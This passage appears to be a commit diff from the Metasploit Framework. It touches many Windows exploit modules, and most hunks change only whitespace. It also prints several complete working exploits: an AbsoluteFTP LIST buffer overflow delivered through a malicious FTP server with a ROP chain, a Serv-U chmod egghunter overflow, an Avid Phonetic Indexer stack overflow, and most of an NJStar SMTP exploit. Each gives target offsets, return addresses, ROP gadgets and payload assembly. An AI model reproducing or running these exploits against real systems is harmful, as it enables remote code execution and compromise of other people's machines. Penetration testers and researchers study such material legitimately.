This module exploits an unsafe Javascript API implemented in Foxit PDF Reader
version 4.2. The createDataObject() Javascript API function allows for writing
arbitrary files to the file system. This issue was fixed in version 4.3.1.0218.
Note: This exploit uses the All Users directory currently, which required
administrator privileges to write to. This means an administrative user has to
open the file to be successful. Kind of lame but thats how it goes sometimes in

8
modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb
View File

@ -16,7 +16,7 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
'Name' => 'Free MP3 CD Ripper 1.1 (WAV File) Stack Buffer Overflow',
'Description' => %q{
'Description' => %q{
This module exploits a stack based buffer overflow found in Free MP3 CD
Ripper 1.1. The overflow is triggered when an unsuspecting user opens a malicious
WAV file.
@ -49,12 +49,12 @@ class Metasploit3 < Msf::Exploit::Remote
'Platform' => 'win',
'Targets' =>
[
[
[
'Windows XP SP3 EN',
{
{
'Ret' => 0x1001860b, # p/p/r in libFLAC.dll
'Offset' => 4116
}
}
],
],
'Privileged' => false,

2
modules/exploits/windows/fileformat/lotusnotes_lzh.rb
View File

@ -55,7 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Ret' => 0x780c26b2 # POP ECX; POP ECX; RETN MSVCP60.dll
}
],
[ 'Lotus Notes 8.5.2 FP2 / Windows Universal / DEP',
{
'Offset' => 6745,

6
modules/exploits/windows/fileformat/mini_stream_pls_bof.rb
View File

@ -15,9 +15,9 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
'Name' => 'Mini-Stream RM-MP3 Converter v3.1.2.1 (PLS File) Stack Buffer Overflow',
'Description' => %q{
'Description' => %q{
This module exploits a stack based buffer overflow found in Mini-Stream RM-MP3
Converter v3.1.2.1. The overflow is triggered when an unsuspecting victim
Converter v3.1.2.1. The overflow is triggered when an unsuspecting victim
opens the malicious PLS file.
},
'License' => MSF_LICENSE,
@ -59,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote
{
'Ret' => 0x100371f5, # call esp in MSRMfilter03.dll
'Offset' => 17417
}
}
]
],
'Privileged' => false,

2
modules/exploits/windows/fileformat/visiwave_vwr_type.rb
View File

@ -42,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2011-2386' ],
[ 'CVE', '2011-2386' ],
[ 'OSVDB', '72464'],
[ 'URL', 'http://www.visiwave.com/blog/index.php?/archives/4-Version-2.1.9-Released.html' ],
[ 'URL', 'http://www.stratsec.net/Research/Advisories/VisiWave-Site-Survey-Report-Trusted-Pointer-%28SS-20'],

4
modules/exploits/windows/fileformat/vlc_webm.rb
View File

@ -109,7 +109,7 @@ class Metasploit3 < Msf::Exploit::Remote
file << "\x01\x00\x00\x00" #
file << "\x01\xff\xff\xff" # This triggers our heap spray...
file << [target.ret].pack('V') # Pointer to our heap spray
# The alignment plays nice, so EIP will always
# hit our pivot when our heapspray works. ESI contains
# 0x030b030a, which will point to one of our "pop; retn"
@ -144,7 +144,7 @@ class Metasploit3 < Msf::Exploit::Remote
rop = rop.pack('V*')
# Overwrite the bad pointer with the address of an infinite
# loop so the other threads spin instead of crashing
# loop so the other threads spin instead of crashing
rop << "\xc7\x05"
rop << [spray + 0xc].pack('V')
rop << [rop_base + 0x1c070].pack('V') # mov DWORD PTR ds:[ptr],&loop

12
modules/exploits/windows/fileformat/wireshark_packet_dect.rb
View File

@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote
OptString.new('FILENAME', [ true, 'pcap file', 'passwords.pcap']),
], self.class)
end
def junk
return rand_text(4).unpack("L")[0].to_i
end
@ -102,9 +102,9 @@ class Metasploit3 < Msf::Exploit::Remote
# tx dadr00p (https://twitter.com/dietersar) for testing the offsets below
rop_pivot =
[
0x618d7d0e, # RET
0x618d7d0e, # RET
0x618d7d0e, # RET
0x618d7d0e, # RET
0x618d7d0e, # RET
0x618d7d0e, # RET
0x64f9d5ec, # ADD ESP,0C # RET - libfontconfig-1.dll
0x618d7d0e, # RET <- don't count on this one !
0x618d7d0e, # RET
@ -124,7 +124,7 @@ class Metasploit3 < Msf::Exploit::Remote
rop_gadgets =
[
0x6d7155cb, # PUSH ESP # POP EBX # POP EBP # RETN **[libpangoft2-1.0-0.dll]
junk,
0x6d596e31, # MOV EAX,EBX # POP EBX # POP EBP # RETN **[libgio-2.0-0.dll]
@ -132,7 +132,7 @@ class Metasploit3 < Msf::Exploit::Remote
junk,
0x61c14552, # POP EBX # RETN ** [freetype6.dll]
0x00000800, # size - 0x800 should be more than enough
0x61c14043, # POP ESI # RETN ** [freetype6.dll]
0x61c14043, # POP ESI # RETN ** [freetype6.dll]
0x0000009C,
0x6d58321a, # ADD EAX,ESI # POP ESI # POP EBP # RETN **[libgio-2.0-0.dll]
junk,

291
modules/exploits/windows/ftp/absolute_ftp_list_bof.rb
View File

@ -1,145 +1,146 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::FtpServer
def initialize(info = {})
super(update_info(info,
'Name' => 'AbsoluteFTP 1.9.6 - 2.2.10 Remote Buffer Overflow (LIST)',
'Description' => %q{
This module exploits VanDyke Software AbsoluteFTP by overflowing
a filename buffer related to the LIST command.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Node', # Original discovery, MSF module, ROP code
],
'References' =>
[
#[ 'OSVDB', '---' ],
#[ 'CVE', '---' ],
[ 'URL', 'http://www.exploit-db.com/exploits/18102/' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Platform' => 'win',
'Payload' =>
{
'BadChars' => "\x00\x0d\x5c\x2f\x0a",
},
'Targets' =>
[
[
'WinXP SP2 - Windows 7 SP1 / AbsoluteFTP 1.9.6 - 2.2.10.252',
{
'Ret' => 0x5f479005,
'Offset' => 3336
}
],
],
'Privileged' => false,
'DisclosureDate' => 'Nov 9 2011',
'DefaultTarget' => 0))
end
#copypasted from ScriptFTP exploit
def on_client_unknown_command(c,cmd,arg)
c.put("200 OK\r\n")
end
def on_client_command_list(c,arg)
conn = establish_data_connection(c)
if(not conn)
c.put("425 Can't build data connection\r\n")
return
end
print_status(" - Data connection set up")
code = 150
c.put("#{code} Here comes the directory listing.\r\n")
code = 226
c.put("#{code} Directory send ok.\r\n")
rop_gadgets =
[
0x5f46a206, # POP EAX # RETN (MFC42.DLL)
0x5f49b260, # <- *&VirtualProtect()
0x5f413fa0, # MOV EAX,DWORD PTR DS:[EAX] # RETN 04 ** [MFC42.DLL]
0x5f418d93, # PUSH EAX # ADD AL,5F # POP ESI # POP EBX # RETN ** [MFC42.DLL]
0x90909090, # NOPS (RETN 4)
0x90909090, # NOPS (-> ebx)
0x5f432001, # POP EBP # RETN (MFC42.DLL)
0x5F4774D5, # ptr to 'jmp esp' (from MFC42.DLL)
0x5f46a206, # POP EAX # RETN (MFC42.DLL)
0xfffffdff, # value to negate, target value : 0x00000201, target reg : ebx #<--ADJUST ME FOR BIGGER PAYLOAD
0x5f46f6dd, # NEG EAX # RETN (MFC42.DLL)
0x5f47909a, # XCHG EAX,EBX # DEC EDX # POP EDI # RETN (MFC42.DLL)
0x90909090, # NOPS (-> edi)
0x5f498456, # POP ECX # RETN (MFC42.DLL)
0x5F4D1115, # RW pointer (lpOldProtect) (-> ecx) !!!
0x5f46a206, # POP EAX # RETN (MFC42.DLL)
0xffffffc0, # value to negate, target value : 0x00000040, target reg : edx
0x5f46f6dd, # NEG EAX # RETN (MFC42.DLL)
0x5f4892df, # XCHG EAX,EDX # DEC EAX # POP EDI # RETN (MFC42.DLL)
0x5f479005, # ROP NOP (-> edi)
0x5f46a206, # POP EAX # RETN (MFC42.DLL)
0x90909090, # NOPS (-> eax)
0x5f4755b8, # PUSHAD # RETN (MFC42.DLL)
].pack("V*")
buffer = [0x5f479005].pack("V*")*848 #ROP NOP's
buffer << rop_gadgets
buffer << "\x90"*30
buffer << payload.encoded
#copypasted from ScriptFTP exploit
print_status(" - Sending directory list via data connection")
dirlist = "-rwxr-xr-x 5 ftpuser ftpusers 512 Jul 26 2001 #{buffer}.txt\r\n"
dirlist << " 5 ftpuser ftpusers 512 Jul 26 2001 A\r\n"
dirlist << "rwxr-xr-x 5 ftpuser ftpusers 512 Jul 26 2001 #{buffer}.txt\r\n"
conn.put(dirlist)
conn.close
return
end
end
=begin
Exploit has been tested to work on:
AbsoluteFTP 2.2.10 (build 252)
AbsoluteFTP 2.2.9 (build 248)
AbsoluteFTP 2.2.8 (build 241)
AbsoluteFTP 2.2.7 (build 238)
AbsoluteFTP 2.2.6 (build 230)
AbsoluteFTP 2.2.5 (build 225)
AbsoluteFTP 2.2.4 (build 216)
AbsoluteFTP 2.2.3 (build 210)
AbsoluteFTP 2.2.2 (build 203)
AbsoluteFTP 2.2 (build 197)
AbsoluteFTP 2.2 (build 291)
AbsoluteFTP 2.2B3 (build 163)
AbsoluteFTP 2.2B2 (build 158)
AbsoluteFTP 2.2B1 (build 144)
AbsoluteFTP 2.0.5 (build 297)
AbsoluteFTP 2.0.4 (build 293)
AbsoluteFTP 2.0.3 (build 289)
AbsoluteFTP 1.9.6
Does not work on:
AbsoluteFTP 1.8
=end
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::FtpServer
def initialize(info = {})
super(update_info(info,
'Name' => 'AbsoluteFTP 1.9.6 - 2.2.10 Remote Buffer Overflow (LIST)',
'Description' => %q{
This module exploits VanDyke Software AbsoluteFTP by overflowing
a filename buffer related to the LIST command.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Node', # Original discovery, MSF module, ROP code
],
'References' =>
[
#[ 'OSVDB', '---' ],
#[ 'CVE', '---' ],
[ 'URL', 'http://www.exploit-db.com/exploits/18102/' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Platform' => 'win',
'Payload' =>
{
'BadChars' => "\x00\x0d\x5c\x2f\x0a",
},
'Targets' =>
[
[
'WinXP SP2 - Windows 7 SP1 / AbsoluteFTP 1.9.6 - 2.2.10.252',
{
'Ret' => 0x5f479005,
'Offset' => 3336
}
],
],
'Privileged' => false,
'DisclosureDate' => 'Nov 9 2011',
'DefaultTarget' => 0))
end
#copypasted from ScriptFTP exploit
def on_client_unknown_command(c,cmd,arg)
c.put("200 OK\r\n")
end
def on_client_command_list(c,arg)
conn = establish_data_connection(c)
if(not conn)
c.put("425 Can't build data connection\r\n")
return
end
print_status(" - Data connection set up")
code = 150
c.put("#{code} Here comes the directory listing.\r\n")
code = 226
c.put("#{code} Directory send ok.\r\n")
rop_gadgets =
[
0x5f46a206, # POP EAX # RETN (MFC42.DLL)
0x5f49b260, # <- *&VirtualProtect()
0x5f413fa0, # MOV EAX,DWORD PTR DS:[EAX] # RETN 04 ** [MFC42.DLL]
0x5f418d93, # PUSH EAX # ADD AL,5F # POP ESI # POP EBX # RETN ** [MFC42.DLL]
0x90909090, # NOPS (RETN 4)
0x90909090, # NOPS (-> ebx)
0x5f432001, # POP EBP # RETN (MFC42.DLL)
0x5F4774D5, # ptr to 'jmp esp' (from MFC42.DLL)
0x5f46a206, # POP EAX # RETN (MFC42.DLL)
0xfffffdff, # value to negate, target value : 0x00000201, target reg : ebx #<--ADJUST ME FOR BIGGER PAYLOAD
0x5f46f6dd, # NEG EAX # RETN (MFC42.DLL)
0x5f47909a, # XCHG EAX,EBX # DEC EDX # POP EDI # RETN (MFC42.DLL)
0x90909090, # NOPS (-> edi)
0x5f498456, # POP ECX # RETN (MFC42.DLL)
0x5F4D1115, # RW pointer (lpOldProtect) (-> ecx) !!!
0x5f46a206, # POP EAX # RETN (MFC42.DLL)
0xffffffc0, # value to negate, target value : 0x00000040, target reg : edx
0x5f46f6dd, # NEG EAX # RETN (MFC42.DLL)
0x5f4892df, # XCHG EAX,EDX # DEC EAX # POP EDI # RETN (MFC42.DLL)
0x5f479005, # ROP NOP (-> edi)
0x5f46a206, # POP EAX # RETN (MFC42.DLL)
0x90909090, # NOPS (-> eax)
0x5f4755b8, # PUSHAD # RETN (MFC42.DLL)
].pack("V*")
buffer = [0x5f479005].pack("V*")*848 #ROP NOP's
buffer << rop_gadgets
buffer << "\x90"*30
buffer << payload.encoded
#copypasted from ScriptFTP exploit
print_status(" - Sending directory list via data connection")
dirlist = "-rwxr-xr-x 5 ftpuser ftpusers 512 Jul 26 2001 #{buffer}.txt\r\n"
dirlist << " 5 ftpuser ftpusers 512 Jul 26 2001 A\r\n"
dirlist << "rwxr-xr-x 5 ftpuser ftpusers 512 Jul 26 2001 #{buffer}.txt\r\n"
conn.put(dirlist)
conn.close
return
end
end
=begin
Exploit has been tested to work on:
AbsoluteFTP 2.2.10 (build 252)
AbsoluteFTP 2.2.9 (build 248)
AbsoluteFTP 2.2.8 (build 241)
AbsoluteFTP 2.2.7 (build 238)
AbsoluteFTP 2.2.6 (build 230)
AbsoluteFTP 2.2.5 (build 225)
AbsoluteFTP 2.2.4 (build 216)
AbsoluteFTP 2.2.3 (build 210)
AbsoluteFTP 2.2.2 (build 203)
AbsoluteFTP 2.2 (build 197)
AbsoluteFTP 2.2 (build 291)
AbsoluteFTP 2.2B3 (build 163)
AbsoluteFTP 2.2B2 (build 158)
AbsoluteFTP 2.2B1 (build 144)
AbsoluteFTP 2.0.5 (build 297)
AbsoluteFTP 2.0.4 (build 293)
AbsoluteFTP 2.0.3 (build 289)
AbsoluteFTP 1.9.6
Does not work on:
AbsoluteFTP 1.8
=end

102
modules/exploits/windows/ftp/servu_chmod.rb Normal file
View File

@ -0,0 +1,102 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Egghunter
include Msf::Exploit::Remote::Ftp
def initialize(info = {})
super(update_info(info,
'Name' => 'Serv-U FTP Server <4.2 Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the site chmod command
in versions of Serv-U FTP Server prior to 4.2.
You must have valid credentials to trigger this vulnerability. Exploitation
also leaves the service in a non-functional state.
},
'Author' => 'thelightcosine <thelightcosine[at]metasploit.com>',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2004-2111'],
[ 'OSVDB', '3713'],
[ 'BID', '9483'],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
'DisableNops' => true,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows 2000 SP0-4 EN', {
'Ret' => 0x750212bc, #WS2HELP.DLL
'Offset' => 396 } ],
[ 'Windows XP SP0-1 EN', {
'Ret' => 0x71aa388f, #WS2HELP.DLL
'Offset' => 394 } ]
],
'DisclosureDate' => 'Dec 31 2004',
'DefaultTarget' => 0))
end
def check
connect
disconnect
if (banner =~ /Serv-U FTP Server v((4.(0|1))|3.\d)/)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
connect_login
eggoptions =
{
:checksum => true,
:eggtag => "W00T"
}
hunter,egg = generate_egghunter(payload.encoded,payload_badchars,eggoptions)
buffer = "chmod 777 "
buffer << make_nops(target['Offset'] - egg.length - hunter.length)
buffer << egg
buffer << hunter
buffer << "\xeb\xc9\x41\x41" #nseh, jump back to egghunter
buffer << [target.ret].pack('V') #seh
buffer << rand_text(5000)
print_status("Trying target #{target.name}...")
send_cmd( ['SITE', buffer] , false)
handler
disconnect
end
end

2
modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb
View File

@ -55,7 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote
],
'DisclosureDate' => 'July 25 2011',
'DefaultTarget' => 0))
register_options(
[

2
modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb
View File

@ -106,7 +106,7 @@ class Metasploit3 < Msf::Exploit::Remote
'ctype' => 'application/soap+xml; charset=utf-8',
'data' => soap,
}, 5)
if ( res and res.body =~ /SUCCESS/ )
#print_good("Executing command...")
else

4
modules/exploits/windows/http/hp_nnm_getnnmdata_hostname.rb
View File

@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote
boom << hunter + egg + egg
boom << payload.encoded
boom << rand_text_alpha_upper(90024 - payload.encoded.length)
sploit = "SnmpVals=&Hostname=#{boom}"
print_status("Trying target #{target.name}...")
@ -86,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote
'method' => 'POST',
'data' => sploit
}, 8)
handler
end

2
modules/exploits/windows/http/hp_nnm_getnnmdata_icount.rb
View File

@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote
boom << hunter + egg + egg
boom << payload.encoded
boom << rand_text_alpha_upper(9024 - payload.encoded.length)
sploit = "SnmpVals=&ICount=-9#{boom}"
print_status("Trying target #{target.name}...")

2
modules/exploits/windows/http/hp_nnm_getnnmdata_maxage.rb
View File

@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote
boom << hunter + egg + egg
boom << payload.encoded
boom << rand_text_alpha_upper(9024 - payload.encoded.length)
sploit = "SnmpVals=&MaxAge=#{boom}"
print_status("Trying target #{target.name}...")

2
modules/exploits/windows/http/hp_openview_insight_backdoor.rb
View File

@ -104,7 +104,7 @@ this.internal.addRole("admin");
}
}, 5)
if ( res and res.code == 200 )
print_status("Login/Upload successful. Triggering payload at '/help/#{dir}/#{page}'...")
send_request_raw({

2
modules/exploits/windows/http/manageengine_apps_mngr.rb
View File

@ -33,7 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
],
'DefaultTarget' => 0
)
register_options(
[ Opt::RPORT(9090),
OptString.new('URI', [false, "URI for Applications Manager", '/']),

10
modules/exploits/windows/http/osb_uname_jlist.rb
View File

@ -61,14 +61,14 @@ class Metasploit3 < Msf::Exploit::Remote
def windows_stager
exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
execute_cmdstager({ :temp => '.'})
@payload_exe = payload_exe
print_status("Attempting to execute the payload...")
execute_command(@payload_exe)
end
def execute_command(cmd, opts = {})
@ -84,7 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote
sessionid = res.headers['Set-Cookie'].split(';')[0]
data = '?type=Job&jlist=0%26' + Rex::Text::uri_encode(cmd)
send_request_raw(
{
'uri' => '/property_box.php' + data,
@ -114,7 +114,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
handler
end
end

2
modules/exploits/windows/lotus/domino_icalendar_organizer.rb
View File

@ -107,7 +107,7 @@ class Metasploit3 < Msf::Exploit::Remote
return Exploit::CheckCode::Safe
end
end
def exploit
sploit = ''
if target.name =~ /Windows 2000 SP4/

2
modules/exploits/windows/lotus/lotusnotes_lzh.rb
View File

@ -58,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Ret' => 0x780c26b2 # POP ECX; POP ECX; RETN MSVCP60.dll
}
],
[ 'Lotus Notes 8.5.2 FP2 / Windows Universal / DEP',
{
'Offset' => 6745,

112
modules/exploits/windows/misc/avidphoneticindexer.rb Normal file
View File

@ -0,0 +1,112 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
def initialize(info={})
super(update_info(info,
'Name' => "Avid Media Composer 5.5 - Avid Phonetic Indexer Stack Overflow",
'Description' => %q{
This module exploits a stack buffer overflow in process
AvidPhoneticIndexer.exe (port 4659), which comes as part of the Avid Media Composer
5.5 Editing Suite. This daemon sometimes starts on a different port; if you start
it standalone it will run on port 4660.
},
'License' => MSF_LICENSE,
'Author' =>
[
'vt [nick.freeman@security-assessment.com]',
],
'References' =>
[
['OSVDB', '77376'],
[ 'URL', 'http://www.security-assessment.com/files/documents/advisory/Avid_Media_Composer-Phonetic_Indexer-Remote_Stack_Buffer_Overflow.pdf' ],
],
'Payload' =>
{
'Space' => 1012,
'BadChars' => "\x00\x09\x0a\x0d\x20",
'DisableNops' => true,
'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
'EncoderOptions' =>
{
'BufferRegister' => 'EAX',
}
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows XP Professional SP3',
{
'Ret' => 0x028B35EB #ADD ESP, 1800; RET (il.dll)
}
],
],
'Privileged' => false,
'DisclosureDate' => "Nov 29 2011",
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(4659),
], self.class)
end
def exploit
rop_gadgets = [
# ROP chain (sayonara) courtesy of WhitePhosphorus (thanks guys!)
# a non-sayonara ROP would be super easy too, I'm just lazy :)
0x7C344CC1, # pop eax;ret;
0x7C3410C2, # pop ecx;pop ecx;ret;
0x7C342462, # xor chain; call eax {0x7C3410C2}
0x7C38C510, # writeable location for lpflOldProtect
0x7C365645, # pop esi;ret;
0x7C345243, # ret;
0x7C348F46, # pop ebp;ret;
0x7C3487EC, # call eax
0x7C344CC1, # pop eax;ret;
0xfffffbfc, # {size}
0x7C34D749, # neg eax;ret; {adjust size}
0x7C3458AA, # add ebx, eax;ret; {size into ebx}
0x7C3439FA, # pop edx;ret;
0xFFFFFFC0, # {flag}
0x7C351EB1, # neg edx;ret; {adjust flag}
0x7C354648, # pop edi;ret;
0x7C3530EA, # mov eax,[eax];ret;
0x7C344CC1, # pop eax;ret;
0x7C37A181, # (VP RVA + 30) - {0xEF adjustment}
0x7C355AEB, # sub eax,30;ret;
0x7C378C81, # pushad; add al,0xef; ret;
0x7C36683F, # push esp;ret;
].pack("V*")
# need to control a buffer reg for the msf gen'd payload to fly. in this case:
bufregfix = "\x8b\xc4" # MOV EAX,ESP
bufregfix += "\x83\xc0\x10" # ADD EAX,10
connect
sploit = ''
sploit << rand_text_alpha_upper(216)
sploit << [target.ret].pack('V*')
sploit << "A"*732 #This avoids a busted LoadLibrary
sploit << rop_gadgets
sploit << bufregfix
sploit << "\xeb\x09"
sploit << rand_text_alpha_upper(9)
sploit << payload.encoded
sock.put(sploit)
handler
disconnect
end
end

2
modules/exploits/windows/misc/bcaaa_bof.rb
View File

@ -62,7 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote
OptInt.new("ATTEMPTS", [true, "Number of attempts to try to exploit", 3]),
], self.class)
end
def junk
return rand_text(4).unpack("L")[0].to_i
end

2
modules/exploits/windows/misc/hp_omniinet_3.rb
View File

@ -124,7 +124,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Trying #{target.name}...")
sock.put(packet)
select(nil,nil,nil,10)
handler
disconnect

2
modules/exploits/windows/misc/pxexploit.rb
View File

@ -28,7 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote
The default configuration loads a linux kernel and initrd into memory that
reads the hard drive; placing the payload on the hard drive of any Windows
partition seen.
Note: the displayed IP address of a target is the address this DHCP server
handed out, not the "normal" IP address the host uses.
},

2
modules/exploits/windows/misc/wireshark_packet_dect.rb
View File

@ -121,7 +121,7 @@ class Metasploit3 < Msf::Exploit::Remote
junk,
0x61c14552, # POP EBX # RETN ** [freetype6.dll]
0x00000800, # size - 0x800 should be more than enough
0x61c14043, # POP ESI # RETN ** [freetype6.dll]
0x61c14043, # POP ESI # RETN ** [freetype6.dll]
0x0000009C,
0x6d58321a, # ADD EAX,ESI # POP ESI # POP EBP # RETN **[libgio-2.0-0.dll]
junk,

2
modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb
View File

@ -453,7 +453,7 @@ exec sp_executesql @z|
def mssql_query_version
delay = 5
# Let's first check that we can reach the host with no problems

2
modules/exploits/windows/mssql/mssql_payload.rb
View File

@ -87,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
method = datastore['METHOD'].downcase
if (method =~ /^cmd/)
execute_cmdstager({ :linemax => 1500, :nodelete => true })
#execute_cmdstager({ :linemax => 1500 })

2
modules/exploits/windows/scada/igss9_igssdataserver_rename.rb
View File

@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote
],
'Privileged' => false,
'DisclosureDate' => "Mar 24 2011"))
register_options(
[
Opt::RPORT(12401, false),

2
modules/exploits/windows/scada/igss9_misc.rb
View File

@ -55,7 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote
],
'Privileged' => false,
'DisclosureDate' => "Mar 24 2011"))
register_options(
[
Opt::RPORT(0, false),

2
modules/exploits/windows/scada/realwin_scpc_initialize.rb
View File

@ -67,7 +67,7 @@ class Metasploit3 < Msf::Exploit::Remote
data << rand_text_alpha_upper(228)
data << generate_seh_payload(target.ret)
data << rand_text_alpha_upper(10024 - payload.encoded.length)
data << "\x00"
data << "\x00"
print_status("Trying target #{target.name}...")
sock.put(data)

2
modules/exploits/windows/scada/realwin_scpc_initialize_rf.rb
View File

@ -67,7 +67,7 @@ class Metasploit3 < Msf::Exploit::Remote
data << rand_text_alpha_upper(228)
data << generate_seh_payload(target.ret)
data << rand_text_alpha_upper(10024 - payload.encoded.length)
data << "\x00"
data << "\x00"
print_status("Trying target #{target.name}...")
sock.put(data)

4
modules/exploits/windows/smb/ms08_067_netapi.rb
View File

@ -656,7 +656,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Standard return-to-ESI without NX bypass
# Provided by Masashi Fujiwara
[ 'Windows 2003 SP2 Japanese (NO NX)',
@ -1167,7 +1167,7 @@ class Metasploit3 < Msf::Exploit::Remote
gadget3.unpack('V').first
]
# convert the meta rop into concrete bytes
rvas = rvasets[version]

409
modules/exploits/windows/smtp/njstar_smtp_bof.rb
View File

@ -1,204 +1,205 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Egghunter
def initialize(info = {})
super(update_info(info,
'Name' => 'NJStar Communicator 3.00 MiniSMTP Server Remote Exploit',
'Description' => %q{
This module exploits a stack buffer overflow vulnerability in NJStar Communicator
Version 3.00 MiniSMTP server. The MiniSMTP application can be seen in multiple
NJStar products, and will continue to run in the background even if the
software is already shutdown. According to the vendor's testimonials,
NJStar software is also used by well known companies such as Siemens, NEC,
Google, Yahoo, eBay; government agencies such as the FBI, Department of
Justice (HK); as well as a long list of universities such as Yale, Harvard,
University of Tokyo, etc.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Dillon Beresford', # Original discovery and MSF Module.
],
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '76728' ],
#[ 'CVE', '' ],
[ 'URL', 'http://www.njstar.com/cms/njstar-communicator' ],
[ 'URL', 'http://www.exploit-db.com/exploits/18057/' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Platform' => 'win',
'Payload' =>
{
'BadChars' => "\x00",
'StackAdjustment' => -1500,
},
'Targets' =>
[
[
'Windows XP SP2/SP3',
{
'Ret' => 0x77c35459, # PUSH ESP; RETN (MSVCRT.dll)
'Offset' => 247,
}
],
[
# Can't test patch level on this one, because you can't
# even update Win2k3 SP0 anymore from Windows Update
'Windows Server 2003 SP0',
{
'Ret' => 0x77d20738, # JMP ESP (USER32.dll)
'Offset' => 247,
}
],
[
'Windows Server 2003 SP1/SP2',
{
'Ret' => 0x77BE2265, # PUSH ESP; RETN (MSVCRT.dll)
'Offset' => 247,
}
]
],
'Privileged' => false,
'DisclosureDate' => 'Oct 31 2011',
'DefaultTarget' => 0))
register_options([Opt::RPORT(25)], self.class)
end
def check
connect
# We get a response like: "220 [host-name] Service Ready"
# But we don't really care about this one
res = sock.get_once(-1, 5)
vprint_status("Banner: #{res.to_s.chop}")
sock.puts("HELP\r\n")
# But the HELP response will tell us if this is a NJStar SMTP or not
res = sock.get_once(-1, 5)
vprint_status("HELP Response: #{res.to_s.chop}")
disconnect
# I can only flag it as "Detected" because it doesn't return a version
if res =~ /Windows E-mail Server From NJStar Software/i
return Exploit::CheckCode::Detected
end
return Exploit::CheckCode::Safe
end
def exploit
eggoptions =
{
:checksum => true,
:eggtag => "w00t"
}
hunter,egg = generate_egghunter(payload.encoded,payload_badchars,eggoptions)
buffer = rand_text(target['Offset'])
buffer << [target.ret].pack('V')
buffer << hunter
buffer << make_nops(4)
# Just some debugging output so we can see lengths and byte size of each of our buffer.
vprint_status("egg: %u bytes: \n" % egg.length + Rex::Text.to_hex_dump(egg))
vprint_status("hunter: %u bytes: \n" % hunter.length + Rex::Text.to_hex_dump(hunter))
vprint_status("buffer: %u bytes:\n" % buffer.length + Rex::Text.to_hex_dump(buffer))
print_status("Trying target #{target.name}...")
# har har har you get trick no treat...
# we dont have very much space so we
# send our egg in a seperate connection
connect
print_status("Sending the egg...")
sock.put(egg)
# I think you betta call, ghostbusters...
# now we send our evil buffer along with the
# egg hunter, we are doing multiple connections
# to solve the issue with limited stack space.
